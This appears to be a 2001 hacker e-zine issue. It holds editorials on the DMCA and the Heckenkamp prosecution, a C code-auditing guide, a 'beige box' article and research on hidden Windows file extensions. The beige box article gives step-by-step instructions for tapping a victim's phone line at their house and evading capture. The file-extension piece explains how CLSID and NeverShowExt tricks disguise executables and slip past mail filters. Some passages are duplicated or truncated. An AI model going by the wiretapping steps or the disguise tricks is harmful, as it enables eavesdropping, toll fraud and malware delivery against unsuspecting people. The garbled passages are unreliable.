H A C K E R ' S D I G E S T ---------------------------------------------------------------------- www.hackersdigest.com FALL 2001 ISSUE 2 Pure Uncut Information ====================================================================* |Power to the People ==================== |Hacker's Digest Focus Jerome Heckenkamp ======================================== |Guidelines for C Source Code Auditing ====================================== |The Cordless Beige Box Theory ============================== |Invisible File Extensions on Windows ===================================== |Strategies for Defeating Distributed Attacks ============================================= |Autopsy of a Successful Intrusion ================================== |Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP ================================================================ |An Approach to Systematic Network Auditing =========================================== |Ten Things NOT to do if Arrested ================================= |Statically Detecting Likely Buffer Overflow Vulnerabilities ====================================================================* +==============================================================================+ | Get The Latest Issues | | Join the Mailing List | | --------------------- | | E-mail hd-request@hackersdigest.com with the word subscribe in the | | subject line. | +==============================================================================+ =======================[ Power to the People ]========================== Digital Millennium Copyright Act, a law that turned me, collegles, profes- sors, and many others into criminals overnight. Edward Felten, an encryption researcher, was threatened by the RIAA, if he was to give a lecture on cracking digital watermarks. So, when I read how Disney, one the many corporations that is sueing 2600 for violations of the DMCA, has produced a show to teach children the evils of swapping music on the internet, I was rather appalled. “The Proud Family”, a cartoon series aired on the Disney Channel, told a story of a little girl who spent all of her money on CD’s, was told of a web site called “EZ Jackerster” that provided a Napster like community to swap copyrighted music. Knowing what she was doing is illegal because of the DMCA, the little girl did not want to tell her freind, but did anyway. The whole thing causes a spiral effect and next, no one is paying for music. Next thing you know the little girls house is on the News for being responsible for the down fall of the music industry. If only the little girl knew how Disney played a part of having an extremely bright teenager and his father arrested in Norway after writing a program that would play DVD’s on his computer. Or how its not the rap star “Sir Paid-A-Lot” who would not be paid but the record lable. Perhaps the little girl would have used her money to help support the EFF (www.eff.org) to fight arrogant corporations such as Disney. With that said, despite all of the criticism coming from all sorts of people it just does not look like the DMCA is going anywhere soon. Thats why what Emmanual Goldstein of 2600, with the help of the EFF, is doing is so importent to what we do. I wish them the best of luck. The next thing to be afraid of is the The Security Systems Standards and Certification Act (SSSCA). The SSSCA is the brain child of Senator Hollings that will put even more Americans in jail for making corporations such as Disney mad. It would be a civil offense to sell or create any kind of computer equipment that "does not include and utilize certified security technologies" that is not approved by the federal government. It will create new federal felonies, punishable by five years in prison and fines of up to $500,000, for anyone who distributes copyrighted material with “security measures” disabled or has a network-attached computer that disables copy protection. “Forgetting all the reasons why this is bad copyright policy and bad information policy, it’s terrible science policy,” says Jessica Litman, a law professor at Wayne State University who specializes in intellectual property. With this being extremely important, it is something we will need to come together to fight, it has been over shadowed with the events that occured on September 11th. New and far more dangrous bills were proposed, one of them being the 'Anti-Terrorism' Act. I honestly belive was a bill that took advantage of a nation in mourning. A letter I wrote to Vulnerability Development, a security newsgroup. In case you have been living under a rock the past few weeks. You should know that our civil liberties are under attack. Kevin Poulsen wrote: "Hackers, virus-writers and web site defacers would face life imprisonment without the possibil-ity of parole under legislation proposed by the Bush Administration that would classify most computer crimes as acts of terrorism." (http://www.securityfocus. com/news/257, Hackers face life imprisonment under 'Anti-Terrorism' Act). When you read the news this morning you will see that this bill was passed by the Senate. (http://www.securityfocus.com/news/265, Senate passes terror bill). I will say that most of the readers of this news group are not hackers but Network Administrators that are very involved with the Security Community. That is why I am asking you, not to report minor scans against your network to the abuse department of any ISP if this bill becomes law. I as a Network Administrator for many years now have been on a routine to check my logs for scans against my network every morning and send the logs of attacks to the abuse department of the ISP. I encourage every Network Administrator I ever talked to follow this practice to this day. It is my job Network Administrator to report these attacks on my network, it is what I am paid to do. However if/when this bill becomes law I will no longer report these attacks and I urge every Network Administrator to join me in this Civil Disobedience Protest against this bill. If/When this bill becomes law, Hackers/Script Kiddies will no longer be looked at as just kids messing around with computers, but as terrorists. Just as the press started to tell the difference between a criminal who uses computers and a Hacker. Now they all are just going to be terrorist. I have a problem with this. Perhaps you think this could not happen to you. Well I would suggest you read the story on Jerome Heckenkamp( http://www.freesk8.org/ ). A contributor to BugTraq who wrote a exploit for qpop who is now facing 16 counts of computer crimes, a maximum sentence of 85 years, and up to $4 million in fines. After Qualcomm reported him to the FBI. This case is harsh now, just imagine if this happen under the 'Anti-Terrorism' bill. This could happen to you. Again, I have always felt it was my duty to report attacks against my network to there ISP. I looked at it as doing my part to make the internet more secure. I figured it is a good lesson for the kid to have his service taken away. If this bill becomes law then its no longer just some kid getting his service taken away. It is something that can escalate to much more and could result to some kid going to jail for a long time. I will not be a part of it even if there is just a slight possibility that this can happen. I want nothing to do with it. I ask each and every one of you to join me in this protest. It is not to late to make a difference. Once you lose your right you will never get it back. After I wrote this letter I revived email for days a lot of support as well as a lot of criticism. Most people argued that you do not have a right to write virus however you do. There is nothing illegal about writing computer virues however it is illegal to write them and then release them in the wild. The other point that was made to me was the fact that if everyone stoped reporting these attacks then it would seem as if the law was working and would feul other laws of the sort. This is a great point. The bill was passed however the part that could put hackers in jail for life was removed. Thanks to people like Kevin Poulsen who made the public aware of what could happen. It also shows the power we have to make a differance by contacting our state representatives. ===============[ Hacker's Digest Focus Jerome Heckenkamp ]============== An extremely intelligent individual, Jerome Heckenkamp, also known as ‘sk8’, is facing a maximun sentence of 85 years and close to $4 million dollars in fines, is claiming he is a scapegoat for the FBI. Jerome is being charged with 16 counts of computer crimes with the alleged victims being Ebay, E-Trade, Lycos, Exdous, and Qualcomm. Jerome Heckenkamp, who graduated from college at the age of 18, worked at Los Alamos National Labs as a security researcher, has pleaded innocent to all 16 counts stacked against him as well as refused all plea bargins given to him. The FBI claims that he is the hacker known as MagicFX who has been defacing web sites for years. The story goes like this, Jerome Heckenkamp was a student at the University of Wisconsin. He had a computer with a defualt instalation of Linux that he would preform security audits on in his spare time. In 1999 Jerome had disclosed two security exploits he wrote to BugTraq. Following the unwritten code to the tee. He alerted the vendor of the security hole, gave them more then enough time to write a patch for the security hole he found and on top of that when he released the security hole to bugtraq the changed a line of code that made it useless unless you were smart enough to look at the code and figure out how to make it work. Perhaps he would not even be in this mess if he did not tell Qualcomm. ( The company who owns the secure mail deamon Qmail) After all they were the ones who went to the FBI after machines were getting owned with a 0-day exploit for qpop. In his post to BugTraq he did say "I found this overflow myself earlier this month. Seems someone else recently found it before Qualcomm was able to issue a patch." But lets not be naive, he is a smart kid. The FBI claims he is a hacker known as ‘MagicFX’. Just do a search on google for MagicFX and you will see all of his work. MagicFX has been all over the press for tons of hacks he has pulled. However Jerome Heckenkamp says he is not MagicFX and knows nothing about him. In an article written about MagicFX he is quoted as saying "I exploited a buffer overflow condition, which existed in an SUID root program," says the hacker, who is finishing up a B.S. in computer science. When this interview took place Jerome Heckenkamp had already graduated from college with a degree in computer science. This is just about the only point the authors of Free Sk8 (www.freesk8.org) could make that driffers Jerome Heckenkamp is not MagicFX. However in some of the interviews MagicFX raves about how he had exploited systems using a buffer overflow in a SUID program. Jerome Heckenkamp did write a buffer overflow for just this type of security hole, however lets understand that SUID programs are riddled with security holes to begin with so this does not really mean anything. Another instresting fact is that I could not find any attacks by MagicFX after Jerome Heckenkamp’s arrest. I also have to stress that this really does not mean anything because if I did find someone who was hacked by MagicFX, I would argue that anyone can be MagicFX who owns a keyboard. I mean people are still claiming to see Elvis. So now that we have seen both sides of the story, why does the FBI think Jerome Heckenkamp is MagicFX. Well besides the fact that Jerome Heckenkamp do have a few things in common like the fact that they both went to college. The FBI is claming that some of the attacks had originated from Jerome Heckenkamp’s personal computer. Jerome Heckenkamp’s personal computer plays a very intresting part in all of this. Jerome Heckenkamp owned two computers. One he used frequently and the other had a defualt instalation of Linux in which he would audit in his spare time for security holes. Now he claims that someone (MagicFX) broke into his computer and launched attacks from it. This would explain why he did write in his BugTraq post "I found this overflow myself earlier this month. Seems someone else recently found it before Qualcomm was able to issue a patch." One of the most interesting facts about Jerome’s personal computer is the fact that there was an archive of exploits and a database of computers that have been compromised. Now what are the chances of MagicFX breaking into one of Jerome Heckenkamp’s computers? Well I would have to say the odds are more in his favor after learning that the administrators of the college network broke into his computer as well. It seems that the network administrators were reciveing complaints that the mail server on the network was attacking computers. This shows just how unsecure the second computer was and completely destorys the intergrity of the only evidence they have against Jerome Heckenkamp. Another thing to remember here is that the FBI has been harassing Jerome Heckenkamp for almost a year before they searched and seized his second computer. This gave Jerome Heckenkamp such a huge window to delete or at the very least encrypt this data against him. He is a smart kid, if he was guilty why would he make such a huge mistake? I have been working with the aurthors of www.freesk8.org to write this article and there are a few peices of the puzzle that I could not get answers on. One, there is nothing on the Free Sk8 web site about the charges against him, tampering with a witness. I would really like to know what that is all about. Second, if you check out the Free Sk8 web site there is a FAQ about Jerome Heckenkamp. One of the questions are "Has Heckenkamp ever been convicted of a computer crime before?" with the simple simple answer of just "No." This is true, Jerome has not been arrested before but this would be a good place to mention that US attorneys have said Jerome has admitted to computer crimes while at the university and agreed to a one-year suspension from its graduate school. They also said that he was fired from a student job after he admitted illegally trespassing on an Internet service provider in 1997. When I asked the author of Free Sk8 they had no comment. What makes this case even more strange is the blatent harassment by the FBI. The FBI has been harassing the authors as well as the hosting provider and sucessfully had the site removed from the internet two different times. The other thing about this whole mess is the fact that there was an article written by Adam Penenberg of Forbes. It was a interview with MagicFX. A lot of what was said contradicts the claims from the FBI that Jerome Heckenkamp is MagicFX. This article can not be found in the Forbes archives anymore but all of the other articles written by Adam Penenberg can. Makes you wonder a little bit don’t it? There are a lot of blury lines in this case and its hard to say what really happened. There are just a few facts to the case. Like the fact that there is no evidence to really support the FBI’s claims. Just a computer that according to the FBI was a launching pad for these attacks that has already been proven to be unsecure when the network administrator broke into it. The sad fact that you are guilty untill proven innocent. The only reason Jerome Heckenkamp is walking the streets and not in a cell with crimanals is that a friend posted $50,000 bail. Last, lets not forget the ignorance of the prosecutor Ross Nadel who needs to read a book about networking and not just a few pages to seem like he has some what of a clue. It was so funny yet so sad to read how Ross Nadel tried to expline how IP address as a separate entity between the computer and the internet and the fact that school owned the IP address, and therefore could enter the IP address. All I can say about that is I am glad this guy is a prosecutor because the thought of him defending someone is just frightning. I think that unless the FBI can find some real evidence, Jerome’s life will be back to normal. however its sad to know something like this will follow him for the rest of his life. ===============[ Guidelines for C Source Code Auditing ]================ --- by Mixer --- Introduction I decided to write up this paper because of the many requests I've been getting, and also since I found that no comprehensive resource about source code vulnerability auditing was out there yet. Obviously, this is a problem, as the release rate of serious exploits is currently still increasing, and, more problematic, a few more serious exploits than before are released in private and distributed longer in the "underground" among black-hats, before being available to the full-disclosure community. This situation makes it even more important for the "good guys" (which I associate more with the full disclosure movement) to be able to find their own vulnerabilities, and audit relevant code themselves, for the possibility of hopefully being a few steps beyond the private exploit scene. Of course, code auditing is not the only security measure. A good security design should start before the programming, enforcing guidelines such as software development security design methodology from the very beginning. Generally, security relevant programs should enforce minimum privilege at all times, restricting access wherever possible. The trend toward running daemons and servers inside chroot-cages where possible, is also an important one. However, even that isn't foolproof, in the past, this measure has been circumvented or exploited within limits, with chroot-breaking and kernel weakness-exploiting shellcode. When following a thought-out set of guidelines, writing secure code or making existing code reasonably secure doesn't necessarily require an writing secure code, or making code reasonably secure, generally must not require an orange book certification, or a tiger team of expert coders to sit on the code. To evaluate the cost of code auditing, the biggest point is the project size (i.e., lines of code), and the current stage of design or maturity of the project. Relevant code and programs Security is especially important in the following types of programs: setuid/setgid programs daemons and servers, not limited to those run by root frequently run system programs, and those that may be called from scripts calls of system libraries (e.g. libc) calls of widespread protocol libraries (e.g. kerberos, ssl) kernel sources administrative tools all CGI scripts, and plug-ins for any servers (e.g. php, apache modules) Commonly vulnerable points Here is a list of points that should be scrutinized when doing code audits. You can read more on the process under the next points. Of course, that doesn't mean that all code may be somehow relevant to security, especially if you consider the possibility that pieces of code may be reused in other projects, at other places. However, when searching for vulnerabilities, one should generally concentrate on the following most critical points: Common points of vulnerability: Non-bounds-checking functions: strcpy, sprintf, vsprintf, sscanf Using bounds checking in the format string, instead of the bounds checking functions (e.g. %10s, %6d), is deprecated. Gathering of input in for/while loops, e.g. for(i=0;i 0) buf += bytesread; Calls like execve(), execution pipes, system() and similar things, especially when called with non-static arguments Any repetitive low-level byte operations with insufficient bounds checking Some string operations can be problematic, such as breaking strings apart and indexing them, i.e. strtok and others Logging and debug message interface functions without mandatory security checks in place Bad or fake randomness (example: bind ID spoofing) Insufficient checking for special characters in external data Using read and other network calls without timeouts (can lead to a DoS) External data entry points: Command line arguments (i.e. getopt) and environment arguments (i.e. getenv) System calls, especially those getting foreign input (read, recv, popen, ...) Generally, file handling. Creating files, especially in public file system areas leads to race conditions (not checking for links is also a big problem) System I/O: Library weaknesses. E.g. format bugs, glob bugs, and similar internal weaknesses. (Specific code scanning tools can often be used in these cases.) Kernel weaknesses. E.g. fd_set glitches, socket options, and generally, user-dependent usage of system calls, especially network calls. System facilities. Input from and output to facilities such as syslog, ident, nfs, etc. without proper checking Rare points: One-byte overwriting of bounds (improper use of strlen/sizeof, for example) Using sizeof on non-local pointer variables Comparing signed and unsigned variables (or casting between signed and unsigned) can lead to erroneous values (e.g., -1 becomes UINT_MAX) Auditing: the "black box" approach I shall just mention black box auditing here shortly, as it isn't the main focus of this paper. Black box auditing, however, is the only viable method for auditing non-open-source code (besides reverse engineering, perhaps). To audit an application black box, you first have to understand the exact protocol specifications (or command line arguments or user input format, if it's not a network application). You then try to circumvent these protocol specifications systematically, providing bad commands, bad characters, right commands with slightly wrong arguments, and test different buffer sizes, and record any abnormal reactions to these tests). Further attempts include the circumvention of regular expressions, supposed input filters, and input manipulation at points where no user input, but binary input from another application is expected, etc. Black box auditing tries to actively crack exception handling where it is supposed to exist from the perspective of a potential external intruder. Some simple test tools are out that may help to automate parts of this process, such as "buffer syringe". The aspect of black box auditing to determine the specified protocol and test for any possible violations is also a potentially useful new method that could be implemented in Intrusion Detection Systems. Auditing: the "white box" approach White box testing is the "real stuff", the methodology you will regularly want to use for finding vulnerabilities in a systematic way by looking at the code. And that's basically it's definition, a systematic auditing of the source that (hopefully) makes sure that each single critical point in the source is accounted for. There are two different main approaches. In the top-to-bottom approach, you go and find all places of external user input, system input, sources of data in general, write them down, and start your audit from each of these points. You determine what bounds checking is or is not in place, and based on that, you go down all possible execution branches from there, including the code of all functions called after the input points, the functions called by those functions, and so on, until you've covered all parts of the code relevant to external input. In the bottom-to-top approach, you will start in main() (or the equivalent starting function if wrapped in libraries such as gtk or rpc), or alternatively the server accept/input loop, and begin checking from there. You go down all functions that are called, briefly checking system calls, memory operations, etc. in each function, until you come to functions that don't call any other sub functions. Of course, you'll emphasize on all functions that directly or indirectly handle user input. It's also a good idea is to compare the code with secure standards and good programming practice. To a limited extend, lint and similar programs programs, and strict compiler checks can help you to do so. Also take notice when a program doesn't drop privileges where it could, if it opens files in an insecure manner, and so on. Such small things might give you further pointers as to where security problems may lie. Ideally, a program should always have a minimum of internal self checks (especially the checking of return values of functions), at least in the security critical parts. If a program doesn't have any automated checks, you can try adding some to the code, to see if the program works as it's supposed to work, or as you think it's supposed to work. ==================[ The Cordless Beige Box Theory ]===================== --- by Lucid & Actinide --- Disclaimer: This article file is for informational purposes ONLY! The knowledge, theories, & instructions held herein are not to be practiced, in fact, don't read this, why not just be safe, go lock yourself in your room. kill yourself, do what you have to do, just don't read this. Explanation Ok, so if you don't know what a beige box is, here's small explanation of what it is and what it does. What it is Ever seen the line men at your local B-Box? Ever see the hand sets they have? ( Usually red, blue, or black ). Well a Beige box is a make shift version of a line mans test set. What it does A beige gives one the ability to jack up to one's phone line and make calls, listen in, and pretty much anything else you wanna do with someone's phone line. ( The conf makers best friend. ) What do I need? Cheap cordless phone (rat shack) 9 volt battery coupler ( one that can hold an 8 pack is the best ) Pack of 9 volt batteries ( 8+ ) 10+ foot RJ-11 phone line ( no bright colors! ) Large plastic bag ( ziplock owns me ) Zip ties ( wire ties ) Wire cutters basic knowledge of wire splicing Phillips Head Screw Driver ( The star looking one ) *Optional* Alligator Clips How do I make it & Use it? Simple really. Most cordless phones are ran off of 9volt AC jacks... thus.. this is what ya gotta do. 1: Remove the AC power adapter from the end of the phones power cord. 2: Place your batteries inside the coupler. 3: Splice the battery coupler to the end of the cordless phones power cord. 4: If needed, attach the alligator clips to red and green wires on the RJ-11 phone line. 5: Bag the base ( the charger )as well as the battery pack and make a small hole for the phone line to come out of. 6: Find yourself a victim in a not well lit area, preferably with bushes and trees. 7: Locate the telco box of your victim ( usually a white or green box on the side of the house in the front yard ) 8: Un-screw the damn thing and look at the goodies on the inside. * If it has a RJ-11 jack then alligator clips wont be needed. * If contains a tangled mess of wires, get the alligator clips out 9: Hook up to the person's phone line: * RJ-11 Jack: Umm, hook the phone line into the fucking jack, not exactly brain surgery. * Wires: Locate the red and green wires, hook red to red and green to green. 10: MAKE SURE! You have dial tone, its a bitch when you don't. 11: Hide the base and battery pack in a nearby bush ( or trash can if they got one there ) 12: Do what you want to do... don't get caught. Schematics ( for the geeky ) ____ ______________________#2____________________<| | | ________________ | | | | | | #3 | _______{ }_{ }_ | | | / ____ \ | |____| | / \ Vtech | | | | | | | ______ _____ | | | #1 | | | | | | | | | |_______#4_________________|__[#] $ | | | | | | | | | | | | | [ ] $ | | | | ### | | #5 | | | \____/ | |______|_____| \_______________/ #1 Cordless Phone Base #2 AC power cord #3 9volt Battery Coupler #4 RJ-11 Phone Line #5 Telco Box ===============[ Invisible File Extensions on Windows ]================= --- by Floydman --- Abstract The goal of this paper is to present the research I made on invisible file extensions on the Windows operating systems. After I published my initial research material on various places on the internet, many people pointed me to bits of information that were already known on this topic, but that I didn't know about. However, the experimentation I made brought this problem on a different angle than the other people's previous work, and somehow complements it. In this paper, I will put together all I found on this topic so far. The ultimate goal is to find a)invisible file extensions, and b)can these invisible file extensions are able to run code, and thus be used to propagate a virus. Preface A little while ago, I was having a conversation with some of my colleagues about computer viruses. The "Life Stages" virus was mentionned during the conversation. This virus disguises itself via a file with extension .SHS, while pretending to be a .TXT file. This was possible because the .SHS extension is hidden by Windows, even if it is configured to display all files, all extensions (even for known file types) and the file actually passes fot a (almost) real .TXT file. Following this conversation, I thought to myself "I wonder if there are any other file extensions with this attribute that could potentially be used in a virus design?". This is what I found so far. Targeted audience This document is presented to anyone who has interests in computer security, viruses, operating systems and computing in general. Special Thanks to : Tony, Ken Brown, JFC, Henri, Seva Gluschenko, Adam L. Simms and a couple others for your input in this paper and pointing me at good directions. Thanks also to the original researchers who found some of the things explained here. Introduction A little while ago, I was having a conversation with some of my colleagues about computer viruses. The "Life Stages" virus was mentionned during the conversation. This virus disguises itself via a file with extension .SHS, while pretending to be a .TXT file. This was possible because the .SHS extension is hidden by Windows, even if it is configured to display all files, all extensions (even for known file types) and the file actually passes fot a (almost) real .TXT file. Following this conversation, I thought to myself "I wonder if there are any other file extensions with this attribute that could potentially be used in a virus design?". To do this research, someone suggested me that I plunder the registry, since all file extensions are (supposed) to be listed there. But the registry gives little if no information at all about what is the purpose of a certain file extension in the system, neither about what visual behavior they present to the user (which in turn can use the user gullibility to activate a virus). What was interesting me if how Windows presents the file via the GUI, not just the list of extensions recognized by Windows. Also, I didn't really trust the registry to hold all and every file extension it uses all in the same place (after all, we trusted it to display all file information, didn't we?). It was only after that some people pointed me some research on this topic that was done about a year before. It turns out that the invisivility is caused by a registry key named NeverShowExt. Knowing this, finding invisible extensions becomes a breeze, but back then I didn't know this and looking in the registry to find you-don't-exactly-know-what-you're-looking-for was like searching a needle in a haystack. So I made a Perl script that would generate all possible combinations of 1, 2 and 3 characters long file extensions. I did not test 4, 5 and more letters file extensions, because I did not have the time to plunder through all the possible combinations. But as I have been pointed out, the Windows operating system supports file extensions longer than 3 letters (.HTML is the prime example). Also, the registered file types will vary from one computer to another, since this is tightly related to the installed applications. Some applications will also rename common known file types to their own applicat The .SHS file type The most known file type that is invisible is .SHS, since the "Life Stages" virus used this "feature" to camouflage a virus in what looked like an innocent .TXT ascii file. But the most common invisible file type is used by patically everybody, and that is the .LNK, which are the shortcuts you use on your desktop or menus to open up applications and files. We use to take these shortcuts as an oblect of the operationg system, but in fact they are only small files, with a hidden .LNK extension appended to it. So, back to .SHS, it stands for Shell Scrap. It's an old dinausor from Windows 3.1 that have been mostly unkown until only a couple of years ago. It is used for OLE (Object Linking and Embedding), and using a Shell Scrap, you can just include any file you want, even an executable, in a Word document, for example, and the system will open it for you. The .SHS file will bear an icon ressembling somewhat the one of Notepad, but still slightly different (the bottom of the page is ripped). The .SHS extension itself is invisible, as we said, so you can make it look like it is something else. For an excellent overview of Shell Scraps, see http://www.pc-help.org/security/scrap.htm. The NeverShowExt registry key At this point, I should clarify that when I say that a file extension is invisible, I mean that it is not showing in Windows Explorer, even if you have specified every configuration options to display everything there is to display("Show hidden files and folders", "Hide file extensions for known file types", "Hide protected operating system files"). Although, if you look at these file by displaying the content of a directory in a DOS box, then you'll see the whole filename and extension(s). The component in Windows that makes some files display this kind of behavior is a registry key named NeverShowExt. Here is an example of how this is used in the registry: [HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] @="Scrap object" REG_SZ "NeverShowExt"="" REG_SZ Here are the file extensions that were invisible (or displayed other non standard behavior) by default on my system: .cnf SpeedDial (Extension not visible) .lnk Shortcut (Extension not visible) .mad Microsoft Access Module Shortcut (Extension not visible) .maf Microsoft Access Form Shortcut (Extension not visible) .mag Microsoft Access Diagram Shortcut (Extension not visible) .mam Microsoft Access Macro Shortcut (Extension not visible) .maq Microsoft Access Query Shortcut (Extension not visible) .mar Microsoft Access Report Shortcut (Extension not visible) .mas Microsoft Access StoredProcedure shortcut (Extension not visible) .mat Microsoft Access Table Shortcut (Extension not visible) .mav Microsoft Access View Shortcut (Extension not visible) .maw Microsoft Access Data Access Page Shortcut (Extension not visible) .pif Shortcut to MS-DOS Program (Extension not visible) .scf Windows Explorer Command (Extension not visible, generic icon) .shb Shortcut into a document (Extension not visible) .shs Scrap object (Extension not visible) .uls Internet Location Service (generic icon) .url Internet Shortcut (Extension not visible) .xnk Exchange Shortcut (Extension not visible) Here is a command line directory listing of some test files I made: dir test.* Directory of C:\TEMP 2001-03-30 12:49 7 test.cnf 2001-03-30 12:49 7 test.lnk 2001-03-30 12:49 7 test.mad 2001-03-30 12:49 7 test.maf 2001-03-30 12:49 7 test.mag 2001-03-30 12:49 7 test.mam 2001-03-30 12:49 7 test.maq 2001-03-30 12:49 7 test.mar 2001-03-30 12:49 7 test.mas 2001-03-30 12:49 7 test.mat 2001-03-30 12:49 7 test.mav 2001-03-30 12:49 7 test.maw 2001-03-30 12:49 7 test.pif 2001-03-30 12:49 7 test.scf 2001-03-30 12:49 7 test.shb 2001-03-30 12:49 14 test.shs 2001-03-30 12:43 7 test.shs.txt 2001-03-30 12:42 7 test.txt 2001-03-30 12:42 7 test.txt.shs 2001-03-30 12:42 7 test.uls 2001-03-30 12:49 7 test.url 2001-03-30 12:49 7 test.xnk On the explorer-like tools that look appears as test, test, test, test, test, test, test, test, test, test, test, test, test, test, test, test, test.shs.txt, test.txt, test.txt, test.uls, test, test. Of course, if I would have taken some time to do some research on internet, I would have known this, and then I would have made a simple search for "NeverShowExt" in the registry, and voilà(<--BTW, this is how this word is really spelled), I would have had the list of extensions that were invisible on my computer. This "feature" can be added to any extension, and it can also be removed (by adding or deleting the NeverShowExt keys in the registry). CLSID Excerpt from http://msdn.microsoft.com/library/psdk/com/reg_6vjt.htm "CLSID Key A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, then you need to register a CLSID for each supported class of objects. Registry Entry HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID = Value Entries CLSID Specifies a name that can be displayed in the user interface. Remarks The CLSID key contains information used by the default COM handler to return information about a class when it is in the running state. To obtain a CLSID for your application, you can use the UUIDGEN.EXE found in the \TOOLs directory of the COM Toolkit, or use CoCreateGuid. The CLSID is a 128 bit number, spelled in hex, within a pair of braces." Shortly after I posted my initial research material, I was contacted by Adam L. Simms about an e-mail thread concerning hidden CLSID extensions. Curious to know more on this topic, he forwarded me a part of the e-mail thread containing information about this. As we have seen at the beginning of this chapter, a CLSID is a unique-number descriptor to register applications in an object liking an embedding scheme. In Windows, applications and the various file extensions they are using are closely related. This is why, for example, a .DOC file is associated to the Word application. Well, as it turns out, you can create a file, and instead of putting a normal file extension as we normally do, we can put the associated CLSID as the file's extension. But what's more interesting, it's that the file will automatically assume the properties of the associated file extension, and the extensions itself will be invisible. Here are some examples of CLSID: html application (.HTA) {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} mhtml document {3050F3D9-98B5-11CF-BB82-00AA00BDCE0B} xml {48123bc4-99d9-11d1-a6b3-00c04fd91555} xsl {48123bc4-99d9-11d1-a6b3-00c04fd91555} html {25336920-03F9-11cf-8FD0-00AA00686F13} I made some tests to verify the extent of this "feature", and the results surprised me very much. I created some files using the html_application and html CLSID above. I also created similar files with their associated extensions. I also made some files using randomly chosen CLSID from my registry. While looking at the registry for these extensions and CLSID in [HKEY_CLASSES_ROOT], I also found several descriptors that looked like Access.ShortCut.Macro, Amovie.ActiveMovie Control and CDDBControl.CddbURLManager. Now knowing about the CLSID problem, I found it wise to test a few of these also, just in case ;-) In DOS, the files looked like Volume in drive D is CD Volume Serial Number is 443F-FFED Directory of D:\work\temp . 05-08-01 12:35a . .. 05-08-01 12:35a .. TEST HTA 0 05-08-01 12:36a test.hta TESTTX~1 {25 0 05-08-01 12:37a test.txt.{25336920-03F9-11cf-8FD0-00AA00686F13} TESTTX~1 HTM 0 05-08-01 12:38a test.txt.html TEST PIF 0 05-08-01 12:38a test.pif TEST~1 PIF 0 05-08-01 12:38a test.piffile TESTAC~1 APP 0 05-08-01 12:39a test.Access.Application TESTAC~1 1 0 05-08-01 12:40a test.Access.ShortCut.Macro.1 TEST~1 {9E 0 05-08-01 2:49p test.{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} TEST~1 {9C 0 05-08-01 2:53p test.{9CBBB803-D654-11D1-8818-C199198E9702} TEST~1 {94 0 05-08-01 2:55p test.{944d4c00-dd52-11ce-bf0e-00aa0055595a} TEST~1 {30 0 05-08-01 4:26p test.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} 11 file(s) 0 bytes 2 dir(s) 580,976,640 bytes free In Windows Explorer, the file names are displayed as test, test, test, test, test.Access.Application, test.Access.ShortCut.Macro.1, test.hta, test, test.piffile, test.txt and test.txt.html. However, the "Type" column displays the following information (in the same order): HTML Application, DirectDraw Property Page, SwiftSoft MMLEDPanelX Control, {9E56BE60-C50F-11CF-9A2C-00A0C90A90CE}, APPLICATION File, 1 File, HTML Application, Shortcut to MS-DOS Program, PIFFILE File, Microsoft HTML Document 5.0, Microsoft HTML Document 5.0. It should also be noted that the icons associated with these files were the generic file icon, except for the following: test.{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} displays an enveloppe icon; as in an e-mail software, test.pif have a little arrow on its icon, just like any shortcut link; and the two files identified as Microsoft HTML Document 5.0 have the Internet Explorer icon. It should be pointed out that results may vary. We can see that Windows Explorer assimilates rather easily CLSID extensions, hiding from view in the file name itself, and translating it to it's corresponding file type in the Type column. This makes it even easier than with Shell Scrap to make dangerous files look innocent to the blind-trusting user, who probably have is Windows Explorer display on "Small Icons" instead of "Details", with other configuration by default. The ability to execute code The ability to make a file look like a different type of file, by hiding the file's extension for exemple, was only the first aspect of the research project. For a virus to be viable, we also need to be able to run code. From the list of hidden extensions displayed in chapter 3, I wanted to find out which of these extensions could be used to execute code, which means that it can potentially be used to propagate a virus or other type of malware. My point? That current mail filtering softwares that block certain types of attachment simply don't work. I never thought that this method was a sufficient guard to protect against viruses, since these software will always block the same commonly-used file extensions like .EXE, .COM, .VBS, .SHS, .DLL and the like. But these softwares weren't blocking .SHS before IRC/Stages.worm (Life Stages). And the same will happen when a virus uses one of the flaw described in this paper to propagate itself, because of mainly two things: 1)the products are not proactive, the In fact, the CLSID vulnerability (let's call things with their real names) only makes the problem worse than I originally estimated. While at the beginning of this project, I was worried that unknown file extensions could be used to fool people to click on it and activate virulent code, now thanks to CLSID we also have to worry about already known file extensions as well, as they can be made invisible too without even thinkering with the system (as opposed to the NeverShowExt registry key, which needs to be added in the registry in order to hide a "normal" extension) and unblocked by filtering software (does your mail filtering agent blocks attachements of the {48123bc4-99d9-11d1-a6b3-00c04fd91555} type?). To have an idea of how many systems objects are defined by CLSIDs, check out the registry under [HKEY_CLASSES_ROOT\CLSID]. Just about every component of all the software you know about on your machine is there, and there is even more from the software you probably didn't even know about. That means you The "executability" of a given extension is a relative thing, the things you can and cannot do varies from one file type to another. As one reader noted, you can have different type of "executable files". The first type, the more common, files that contains code that is activated by the OS when the file is launched. This includes, but is not limited to, .EXE, .BAT, .COM, .VBS, .PL and the like. The second type ressembles the first type very much, but the code will be run in a sandboxed environment, instead of running with full privileges. Such files would be .HTML, .PS and .JS. Then some extensions contain executable fully-priviledged code, but cannot be ran directly: .386, .ASP, .DLL, .DRV and .VXD. Finally, some files contains code that can be runned in a sandboxed envrironment, but cannot be executed directly from the OS. Such a file type is .CSS. This research focuses mainly on the first type of files, but the other types can probably be used on some attack scenario too. It's mostly a matter on ingenuity and imagination to find new ways to do old things :-) The thing is to find out if the extensions displayed in chapter 3 can be used to run code. I haven't done much testing on this topic yet (if you happen to play on this topic, let me know of your findings), but it would appear that it is feasible. For example, .CNF (SpeedDial) could potentially be used to make a file that once cliked on, would hang up the modem and make it call a number overseas for phone fraud purposes. Preliminary testing shows that the conditions needed for this scenario to be possible makes it very unprobable to happen in the wild, but technically feasible. But who knows what these other extensions hold? And when you think that still a lot of people are gullible enough to click on a .TXT.VBS file, think what will happen when the .VBS part will be concealed with .{B54F374 Conclusion Unfortunately, I have not really discovered anything new here (altough I wish I had, but others explored these topics before me), but this paper puts in one place all there is to know about invisible file extensions on Windows, and how this can be exploited to convince a computer user to double-click on a executable file, be it to 